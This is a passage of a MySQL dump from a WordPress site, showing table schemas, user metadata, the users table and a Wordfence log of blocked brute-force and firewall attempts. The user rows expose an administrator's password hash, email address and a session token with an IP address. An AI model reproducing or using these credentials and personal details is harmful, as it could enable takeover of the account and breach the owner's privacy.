-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Main','main',0),(3,'pages','pages',0),(4,'top','top',0),(5,'Funeral','funeral',0),(6,'Planning','planning',0),(7,'Family','family',0),(8,'Lawyer','lawyer',0),(9,'Love','love',0),(10,'Marriage','marriage',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=38 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','bournesociety'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'locale',''),(11,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(12,1,'wp_user_level','10'),(13,1,'dismissed_wp_pointers','vc_pointers_backend_editor'),(14,1,'show_welcome_panel','1'),(15,1,'session_tokens','a:1:{s:64:\"20fe3dbc9674b3a17a35245670da16273265db841b02229aa1b645c3387d802c\";a:4:{s:10:\"expiration\";i:1649846575;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36\";s:5:\"login\";i:1649673775;}}'),(16,1,'wp_dashboard_quick_press_last_post_id','376'),(17,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"185.175.113.0\";}'),(18,1,'closedpostboxes_page','a:1:{i:0;s:13:\"pageparentdiv\";}'),(19,1,'metaboxhidden_page','a:5:{i:0;s:19:\"wpb_visual_composer\";i:1;s:10:\"postcustom\";i:2;s:16:\"commentstatusdiv\";i:3;s:7:\"slugdiv\";i:4;s:9:\"authordiv\";}'),(20,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(21,1,'metaboxhidden_nav-menus','a:2:{i:0;s:12:\"add-post_tag\";i:1;s:15:\"add-post_format\";}'),(22,1,'last_login_time','2021-01-25 16:33:05'),(23,1,'wp_user-settings','libraryContent=browse&editor=tinymce&imgsize=full&urlbutton=custom'),(24,1,'wp_user-settings-time','1532693585'),(25,1,'shootingstar_dismissed_notice_shootingstar','1'),(26,1,'nav_menu_recently_edited','3'),(27,2,'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(28,2,'nickname','wordpress'),(29,2,'first_name',''),(30,2,'last_name',''),(31,2,'description',''),(32,2,'rich_editing','true'),(33,2,'comment_shortcuts','false'),(34,2,'admin_color','fresh'),(35,2,'use_ssl','0'),(36,2,'show_admin_bar_front','true'),(37,2,'locale','');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'admin','$P$B2KZp7lH3VrwTlu2.QQAILzudd030r0','bournesociety','amber.platts@vanillacircus.co.uk','','2017-08-22 12:18:56','',0,'bournesociety');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblockediplog`
--

DROP TABLE IF EXISTS `wp_wfblockediplog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblockediplog`
--

LOCK TABLES `wp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wp_wfblockediplog` VALUES ('\0\0\0\0\0\0\0\0\0\0��t�','CN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��tK�','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��tK�','CN',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��tK�','CN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��tK�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','KR',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','KR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','KR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','KR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��;u','TR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','RU',4,18871,'waf'),('\0\0\0\0\0\0\0\0\0\0��\01','SG',11,18872,'waf'),('\0\0\0\0\0\0\0\0\0\0��\05�','SG',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��\05�','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��#,�','KR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��Vt[','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��i�','AU',2,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��j','AU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���0�','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���<','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��?\n�','IR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�','RU',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�+','RU',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�+','RU',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�+','RU',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�+','RU',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',3,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',4,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',4,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',3,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',5,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',5,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',2,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',3,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',21,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����h','DE',3,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����h','DE',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','AE',1,18869,'waf'),('\0\0\0\0\0\0\0\0\0\0��)%�','RU',2,18862,'waf'),('\0\0\0\0\0\0\0\0\0\0���','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���','CN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���F�','CN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���:�','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���5�','HK',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���5�','HK',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r$n�','FR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r4��','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rJ�^','IE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rJ��','IE',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rJ��','IE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rK(�','HK',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rL��','SG',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rL��','SG',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rL��','SG',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rL��','SG',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rL��','SG',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rN+J','JP',11,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��\rN+J','JP',11,18860,'waf'),('\0\0\0\0\0\0\0\0\0\0��\rQ(','NL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rQ(','NL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rQ(','NL',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rQ(','NL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rQ(','NL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rQ(','NL',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rQ(','NL',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r^�,','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r^�,','NL',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r^�,','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r^�,','NL',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r^�,','NL',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rp�','JP',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r~r�','IN',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r�V�','AU',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r�V�','AU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rԀh','SG',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r���','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r�>','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','BH',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��΂k','IN',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0����','IN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��v�x','US',1,18868,'waf'),('\0\0\0\0\0\0\0\0\0\0����','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����','GB',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','SG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���AL','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���~d','US',42,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',4,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��3ѝ','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��5[�','AU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��Uy\\','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Uy\\','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\�','US',3,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\�','US',4,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���?','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��P8','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��P8','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��P8','US',4,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��X&�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��X&�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��X&�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��^x�','NL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��^x�','NL',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��^x�','NL',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��^x�','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��^��','US',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��a��','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��a��','NL',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��bJ�','SG',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��ca�','HK',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��ca�','HK',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��o��','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���_j','CN',3,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��H8�','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��pNH','ID',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��pO�','ID',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�','AU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�','AU',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�','AU',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�','AU',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���','NL',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���','NL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��(�','RU',2,18873,'waf'),('\0\0\0\0\0\0\0\0\0\0��/\0$','BA',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���_�','RU',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0����','TR',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���$O','FR',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0���O�','TR',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���O�','TR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���O�','TR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���O�','TR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���O�','TR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���)','NL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���)','NL',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���)','NL',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���7]','CY',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���7]','CY',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"@�f','KR',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"@�f','KR',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"B��','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"C�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"C��','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"DL ','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"DaF','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"E�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"F]','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"F�A','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"P�R','TW',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"P�R','TW',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Q+','TW',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Q�W','TW',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Q�n','TW',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Q�n','TW',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Q�n','TW',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Tu�','JP',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"W#�','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"W#�','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Yl!','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"]$d','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"]$d','IN',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"]$d','IN',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"^��','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"z[','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"{3','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"{3','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"{��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"}�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"}6�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"}6�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"~��','SG',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"��','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"���','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"���','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"�1�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"�d2','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"���','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"��q','US',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"�+�','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"�w5','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��\'','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��	','GB',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�ޥ','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','BE',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','BE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','BE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','BE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ÇC','BE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ÇC','BE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�D','BE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�D','BE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��#Ɖ�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��#Ɖ�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#Ɖ�','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�,&','BE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�,&','BE',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��C','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ժ�','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ݵ�','TW',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ݵ�','TW',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��j','TW',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��N','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��N','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��v','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��v','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�','TW',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�K�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�K','TW',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�K','TW',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\','ID',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\','ID',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\','ID',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\','ID',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\','ID',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��%\0','NL',2,18871,'waf'),('\0\0\0\0\0\0\0\0\0\0��%H','DE',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��%<��','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��%a��','NL',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��%a��','NL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��%a�b','NL',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�\r�','NL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�\r�','NL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�\r�','NL',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��%���','IR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�[','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�[','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�[','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��%���','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��%���','FR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�','CZ',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��\'f!�','CN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��\'gI�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��(B+�','FR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��(B+�','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��(E��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��(r��','NL',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��(r��','NL',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��(r��','NL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��)]R','TZ',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��)���','MA',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��)�H�','LY',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��)�$','TN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��)�$','TN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��*��','CN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��*��','CN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��*��','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�